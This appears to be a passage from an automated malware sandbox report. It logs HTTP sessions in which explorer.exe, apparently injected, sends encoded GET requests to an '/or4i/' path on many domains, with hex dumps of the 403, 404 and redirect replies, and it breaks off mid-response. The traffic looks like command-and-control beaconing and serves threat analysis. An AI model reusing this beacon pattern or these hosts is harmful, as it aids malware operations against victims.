                                                                                  May 12, 2021 20:04:31.157010078 CEST6060INHTTP/1.1 403 Forbidden
                                                                                  Server: openresty
                                                                                  Date: Wed, 12 May 2021 18:04:31 GMT
                                                                                  Content-Type: text/html
                                                                                  Content-Length: 275
                                                                                  ETag: "6096ba97-113"
                                                                                  Via: 1.1 google
                                                                                  Connection: close
                                                                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                                                                  Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>


                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                  2192.168.2.449757198.54.114.16480C:\Windows\explorer.exe
                                                                                  TimestampkBytes transferredDirectionData
                                                                                  May 12, 2021 20:03:26.705135107 CEST2204OUTGET /or4i/?4h_HCv=a2JDa0Xx22IpWxjP&HFQDEL_8=Nfl9li5qPifS0qmI3oGyYt+1WQBc6+s+CWT3m3ZkN/MuRx1xa905Jr26QEss+PYMzBmi HTTP/1.1
                                                                                  Host: www.nowhealthdays.com
                                                                                  Connection: close
                                                                                  Data Raw: 00 00 00 00 00 00 00
                                                                                  Data Ascii:
                                                                                  May 12, 2021 20:03:26.905880928 CEST2206INHTTP/1.1 404 Not Found
                                                                                  date: Wed, 12 May 2021 18:03:26 GMT
                                                                                  server: Apache
                                                                                  accept-ranges: bytes
                                                                                  transfer-encoding: chunked
                                                                                  content-type: text/html
                                                                                  connection: close
                                                                                  Data Raw: 32 31 36 38 0d 0a 0a 0a 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 61 63 68 65 2d 63 6f 6e 74 72 6f 6c 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 50 72 61 67 6d 61 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 45 78 70 69 72 65 73 22 20 63 6f 6e 74 65 6e 74 3d 22 30 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 20 20 20 20 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 34 70 78 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 31 2e 34 32 38 35 37 31 34 32 39 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 66 66 66 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 32 46 33 32 33 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 73 65 63 74 69 6f 6e 2c 20 66 6f 6f 74 65 72 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 64 69 73 70 6c 61 79 3a 20 62 6c 6f 63 6b 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 2e 63 6f 6e 74 61 69 6e 65 72 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 61 75 74 6f 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 20 61 75 74 6f 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 20 31 30 70 78 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 2e 72 65 73 70 6f 6e 73 65 2d 69 6e 66 6f 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 43 43 43 43 43 43 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 2e 73 74 61 74 75 73 2d 63 6f 64 65 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 35 30 30 25 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 2e 73 74 61 74 75 73 2d 72 65 61 73 6f 6e 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 32 35 30 25 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 64 69 73 70 6c 61 79 3a 20 62 6c 6f 63 6b 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 2e 63 6f 6e 74 61 63 74 2d 69 6e 66 6f 2c 0a 20 20 20 20 20 20 20 20 2e 72 65 61 73 6f 6e 2d 74 65 78 74 20 7b 0a 20 20 20 20 20
                                                                                  Data Ascii: 2168<!DOCTYPE html><html> <head> <meta http-equiv="Content-type" content="text/html; charset=utf-8"> <meta http-equiv="Cache-control" content="no-cache"> <meta http-equiv="Pragma" content="no-cache"> <meta http-equiv="Expires" content="0"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <title>404 Not Found</title> <style type="text/css"> body { font-family: Arial, Helvetica, sans-serif; font-size: 14px; line-height: 1.428571429; background-color: #ffffff; color: #2F3230; padding: 0; margin: 0; } section, footer { display: block; padding: 0; margin: 0; } .container { margin-left: auto; margin-right: auto; padding: 0 10px; } .response-info { color: #CCCCCC; } .status-code { font-size: 500%; } .status-reason { font-size: 250%; display: block; } .contact-info, .reason-text {
                                                                                  May 12, 2021 20:03:26.905924082 CEST2207INData Raw: 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 30 30 30 30 30 30 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 2e 61 64 64 69 74 69 6f 6e 61 6c 2d 69 6e 66 6f 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64
                                                                                  Data Ascii: color: #000000; } .additional-info { background-repeat: no-repeat; background-color: #293A4A; color: #FFFFFF; } .additional-info a { color: #FFFFFF;
                                                                                  May 12, 2021 20:03:26.905945063 CEST2208INData Raw: 2d 61 6c 69 67 6e 3a 20 6c 65 66 74 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 66 6f 6f 74 65 72 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 20 20 20 20 20
                                                                                  Data Ascii: -align: left; } footer { text-align: center; margin: 60px 0; } footer a { text-decoration: none; } footer a img { border: 0; } .cop
                                                                                  May 12, 2021 20:03:26.905966997 CEST2210INData Raw: 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 20 31 30 70 78 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 2e 73 74 61 74 75 73 2d 72 65 61 73 6f 6e 20 7b 0a 20 20 20 20 20 20 20 20 20
                                                                                  Data Ascii: margin: 0 10px; } .status-reason { display: inline; } } @media (min-width: 992px) { .additional-info { background-image: url(data:ima
                                                                                  May 12, 2021 20:03:26.905987978 CEST2211INData Raw: 74 57 34 48 38 69 49 30 67 42 32 4d 7a 66 45 63 56 33 67 42 2b 49 6b 66 44 74 62 79 43 41 54 67 74 48 42 37 6c 33 54 72 4b 55 47 32 79 57 4f 65 37 4f 32 4b 59 51 49 50 45 37 78 46 44 31 32 59 76 79 36 53 76 71 6f 4c 4f 4d 66 39 35 6b 2b 42 76 67
                                                                                  Data Ascii: tW4H8iI0gB2MzfEcV3gB+IkfDtbyCATgtHB7l3TrKUG2yWOe7O2KYQIPE7xFD12Yvy6SvqoLOMf95k+BvgqogCFCx22NdltO1epYc7ycEKSaI9+UAYPGOlKDQYyxDP9Npqv0NKZkS7GuNRQig5pvaYQwdTztjRnCrr/l0b2UgO+wRtMiFCAzqpLL0So+hWmi61Nn3aqKGEzDfFrmEoKqcWSFDRONSrAU0iFYLrHU2RKB3q+HxDH
                                                                                  May 12, 2021 20:03:26.906013012 CEST2213INData Raw: 6b 35 31 53 6d 4f 35 77 77 68 70 48 58 61 63 30 45 33 45 51 45 66 52 49 75 36 54 66 42 59 4c 51 6e 2f 4a 33 65 43 63 46 64 45 37 69 34 64 77 6d 48 63 6b 57 45 72 4a 73 6d 55 37 65 49 73 47 6e 4c 78 70 56 70 56 45 54 49 34 6b 56 4d 33 56 43 55 77
                                                                                  Data Ascii: k51SmO5wwhpHXac0E3EQEfRIu6TfBYLQn/J3eCcFdE7i4dwmHckWErJsmU7eIsGnLxpVpVETI4kVM3VCUw1+XdRPRaM0k64jL1LEFkBBGRw7ad1ZE+AVH74Xh8NQM/dZMxVKDkPCyWmbPJ/8uIQJ/XbiL8bNKvv0vWlLCb0fQjR9zuU1y+sSkjcqsgPAzCVGFWzPpYxJM9GAMXhGRinD85xkrCxEomEY7I7j/40IEvjWlJ7wDzj
                                                                                  May 12, 2021 20:03:26.906034946 CEST2214INData Raw: 35 6a 36 30 42 63 69 38 6f 65 2b 45 4b 45 50 72 59 6d 67 2b 51 4e 4e 4f 77 33 50 64 43 4c 67 70 42 55 52 4f 50 51 31 38 6d 58 31 5a 45 78 38 70 39 2f 2f 49 69 30 71 63 33 51 69 36 43 6d 41 55 31 64 45 70 44 39 53 41 31 74 54 39 38 2f 47 5a 61 64
                                                                                  Data Ascii: 5j60Bci8oe+EKEPrYmg+QNNOw3PdCLgpBUROPQ18mX1ZEx8p9//Ii0qc3Qi6CmAU1dEpD9SA1tT98/GZadvf29GxPYPh9n+MjAuRNg/Hc4WYm8WjT0pABNB7WkAb81kz8fEo5Na0rAQYU8KQEWEPSkAaafnRPiXEGHPCCbcnxphIEPPnhXc9XkRNuHh3Cw8JXteeCV7Zjg/wua8YGl3XvDUPy/c/Avd4/hNDSqegQAAAABJRU5E
                                                                                  May 12, 2021 20:03:26.906058073 CEST2215INData Raw: 6e 74 61 69 6e 65 72 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 61 64 64 69 74 69 6f 6e 61 6c 2d 69 6e 66 6f 2d 69 74 65 6d 73 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                  Data Ascii: ntainer"> <div class="additional-info-items"> <ul> <li> <img src="/img-sys/server_misconfigured.png" class="info-image" /> <div


                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                  3192.168.2.44976334.102.136.18080C:\Windows\explorer.exe
                                                                                  TimestampkBytes transferredDirectionData
                                                                                  May 12, 2021 20:03:32.055988073 CEST5992OUTGET /or4i/?HFQDEL_8=9uknvSs0D9sRUbKPNEJc//q5kM+rT7HBD1bOe0TigX7EwC/pCwMCwQN4ECUA0466XB/p&4h_HCv=a2JDa0Xx22IpWxjP HTTP/1.1
                                                                                  Host: www.ikeberto.com
                                                                                  Connection: close
                                                                                  Data Raw: 00 00 00 00 00 00 00
                                                                                  Data Ascii:
                                                                                  May 12, 2021 20:03:32.193681002 CEST5993INHTTP/1.1 403 Forbidden
                                                                                  Server: openresty
                                                                                  Date: Wed, 12 May 2021 18:03:32 GMT
                                                                                  Content-Type: text/html
                                                                                  Content-Length: 275
                                                                                  ETag: "60995c0c-113"
                                                                                  Via: 1.1 google
                                                                                  Connection: close
                                                                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                                                                  Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>


                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                  4192.168.2.449764185.4.135.13680C:\Windows\explorer.exe
                                                                                  TimestampkBytes transferredDirectionData
                                                                                  May 12, 2021 20:03:37.372333050 CEST6017OUTGET /or4i/?4h_HCv=a2JDa0Xx22IpWxjP&HFQDEL_8=XZ5egFlM4LuR7juc0UFP6fai+XX2I8SV8Ur1Ieq3oNzW4b+OCSm6ABQPGtFRxJXr06kx HTTP/1.1
                                                                                  Host: www.directflence.com
                                                                                  Connection: close
                                                                                  Data Raw: 00 00 00 00 00 00 00
                                                                                  Data Ascii:
                                                                                  May 12, 2021 20:03:37.449553967 CEST6018INHTTP/1.1 301 Moved Permanently
                                                                                  Date: Wed, 12 May 2021 18:03:37 GMT
                                                                                  Server: Apache
                                                                                  Location: https://www.directflence.com/or4i/?4h_HCv=a2JDa0Xx22IpWxjP&HFQDEL_8=XZ5egFlM4LuR7juc0UFP6fai+XX2I8SV8Ur1Ieq3oNzW4b+OCSm6ABQPGtFRxJXr06kx
                                                                                  Cache-Control: max-age=2592000
                                                                                  Expires: Fri, 11 Jun 2021 18:03:37 GMT
                                                                                  Content-Length: 348
                                                                                  Connection: close
                                                                                  Content-Type: text/html; charset=iso-8859-1
                                                                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 64 69 72 65 63 74 66 6c 65 6e 63 65 2e 63 6f 6d 2f 6f 72 34 69 2f 3f 34 68 5f 48 43 76 3d 61 32 4a 44 61 30 58 78 32 32 49 70 57 78 6a 50 26 61 6d 70 3b 48 46 51 44 45 4c 5f 38 3d 58 5a 35 65 67 46 6c 4d 34 4c 75 52 37 6a 75 63 30 55 46 50 36 66 61 69 2b 58 58 32 49 38 53 56 38 55 72 31 49 65 71 33 6f 4e 7a 57 34 62 2b 4f 43 53 6d 36 41 42 51 50 47 74 46 52 78 4a 58 72 30 36 6b 78 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                  Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>301 Moved Permanently</title></head><body><h1>Moved Permanently</h1><p>The document has moved <a href="https://www.directflence.com/or4i/?4h_HCv=a2JDa0Xx22IpWxjP&amp;HFQDEL_8=XZ5egFlM4LuR7juc0UFP6fai+XX2I8SV8Ur1Ieq3oNzW4b+OCSm6ABQPGtFRxJXr06kx">here</a>.</p></body></html>


                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                  5192.168.2.4497653.16.197.480C:\Windows\explorer.exe
                                                                                  TimestampkBytes transferredDirectionData
                                                                                  May 12, 2021 20:03:42.767637014 CEST6019OUTGET /or4i/?HFQDEL_8=kdp3FbqcdOoi47L6CSewezhnIrd3vGjo7ZesdbmmEgh4+nsMxNwHdMyhwqYehAYq5sNV&4h_HCv=a2JDa0Xx22IpWxjP HTTP/1.1
                                                                                  Host: www.mmgenius.com
                                                                                  Connection: close
                                                                                  Data Raw: 00 00 00 00 00 00 00
                                                                                  Data Ascii:
                                                                                  May 12, 2021 20:03:42.905261993 CEST6020INHTTP/1.1 404 Not Found
                                                                                  Date: Wed, 12 May 2021 18:03:42 GMT
                                                                                  Content-Type: text/html
                                                                                  Content-Length: 153
                                                                                  Connection: close
                                                                                  Server: nginx/1.16.1
                                                                                  Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 36 2e 31 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                  Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.16.1</center></body></html>


                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                  6192.168.2.44976634.102.136.18080C:\Windows\explorer.exe
                                                                                  TimestampkBytes transferredDirectionData
                                                                                  May 12, 2021 20:03:48.045959949 CEST6020OUTGET /or4i/?4h_HCv=a2JDa0Xx22IpWxjP&HFQDEL_8=+ijMlDuYhuzidrLjkbi+elVKZ7K6phzLRhFwzYI2MHaYrqu+hiZ6wsf57yroxB2MR5WJ HTTP/1.1
                                                                                  Host: www.rainboxs.com
                                                                                  Connection: close
                                                                                  Data Raw: 00 00 00 00 00 00 00
                                                                                  Data Ascii:
                                                                                  May 12, 2021 20:03:48.182682037 CEST6021INHTTP/1.1 403 Forbidden
                                                                                  Server: openresty
                                                                                  Date: Wed, 12 May 2021 18:03:48 GMT
                                                                                  Content-Type: text/html
                                                                                  Content-Length: 275
                                                                                  ETag: "609953da-113"
                                                                                  Via: 1.1 google
                                                                                  Connection: close
                                                                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                                                                  Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>


                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                  7192.168.2.449767209.222.96.14680C:\Windows\explorer.exe
                                                                                  TimestampkBytes transferredDirectionData
                                                                                  May 12, 2021 20:03:53.476977110 CEST6022OUTGET /or4i/?HFQDEL_8=xTiNYjpz6T1Ak7oOPc1RU9z7aC84W9njSzpqqU4XaljqjdkzZuZgpX+EsFAQyzNyJi0r&4h_HCv=a2JDa0Xx22IpWxjP HTTP/1.1
                                                                                  Host: www.nobleandmarble.com
                                                                                  Connection: close
                                                                                  Data Raw: 00 00 00 00 00 00 00
                                                                                  Data Ascii:
                                                                                  May 12, 2021 20:03:53.613686085 CEST6022INHTTP/1.1 302 Found
                                                                                  Date: Wed, 12 May 2021 18:03:53 GMT
                                                                                  Server: Apache
                                                                                  Location: http://www.nobleandmarble.com/cgi-sys/suspendedpage.cgi?HFQDEL_8=xTiNYjpz6T1Ak7oOPc1RU9z7aC84W9njSzpqqU4XaljqjdkzZuZgpX+EsFAQyzNyJi0r&4h_HCv=a2JDa0Xx22IpWxjP
                                                                                  Content-Length: 345
                                                                                  Connection: close
                                                                                  Content-Type: text/html; charset=iso-8859-1
                                                                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 6e 6f 62 6c 65 61 6e 64 6d 61 72 62 6c 65 2e 63 6f 6d 2f 63 67 69 2d 73 79 73 2f 73 75 73 70 65 6e 64 65 64 70 61 67 65 2e 63 67 69 3f 48 46 51 44 45 4c 5f 38 3d 78 54 69 4e 59 6a 70 7a 36 54 31 41 6b 37 6f 4f 50 63 31 52 55 39 7a 37 61 43 38 34 57 39 6e 6a 53 7a 70 71 71 55 34 58 61 6c 6a 71 6a 64 6b 7a 5a 75 5a 67 70 58 2b 45 73 46 41 51 79 7a 4e 79 4a 69 30 72 26 61 6d 70 3b 34 68 5f 48 43 76 3d 61 32 4a 44 61 30 58 78 32 32 49 70 57 78 6a 50 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                  Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>302 Found</title></head><body><h1>Found</h1><p>The document has moved <a href="http://www.nobleandmarble.com/cgi-sys/suspendedpage.cgi?HFQDEL_8=xTiNYjpz6T1Ak7oOPc1RU9z7aC84W9njSzpqqU4XaljqjdkzZuZgpX+EsFAQyzNyJi0r&amp;4h_HCv=a2JDa0Xx22IpWxjP">here</a>.</p></body></html>


                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                  8192.168.2.44976823.227.38.7480C:\Windows\explorer.exe
                                                                                  TimestampkBytes transferredDirectionData
                                                                                  May 12, 2021 20:04:03.782355070 CEST6024OUTGET /or4i/?HFQDEL_8=bE8h/5YlyIaGfqFoj5Gnx56lPI3pmXv2ej3H/Ly1qjs4t+LIMarOZaaU3+bG1fp/+sg3&4h_HCv=a2JDa0Xx22IpWxjP HTTP/1.1
                                                                                  Host: www.safegrinder.com
                                                                                  Connection: close
                                                                                  Data Raw: 00 00 00 00 00 00 00
                                                                                  Data Ascii:
                                                                                  May 12, 2021 20:04:04.026160002 CEST6026INHTTP/1.1 403 Forbidden
                                                                                  Date: Wed, 12 May 2021 18:04:04 GMT
                                                                                  Content-Type: text/html
                                                                                  Transfer-Encoding: chunked
                                                                                  Connection: close
                                                                                  Vary: Accept-Encoding
                                                                                  X-Sorting-Hat-PodId: 156
                                                                                  X-Sorting-Hat-ShopId: 46831239325
                                                                                  X-Dc: gcp-us-central1
                                                                                  X-Request-ID: e6a60d92-4f25-4e5a-82cb-4009d2ef67ba
                                                                                  X-Permitted-Cross-Domain-Policies: none
                                                                                  X-XSS-Protection: 1; mode=block
                                                                                  X-Download-Options: noopen
                                                                                  X-Content-Type-Options: nosniff
                                                                                  CF-Cache-Status: DYNAMIC
                                                                                  cf-request-id: 0a035919650000c2ef55899000000001
                                                                                  Server: cloudflare
                                                                                  CF-RAY: 64e5913bdf2cc2ef-FRA
                                                                                  alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400
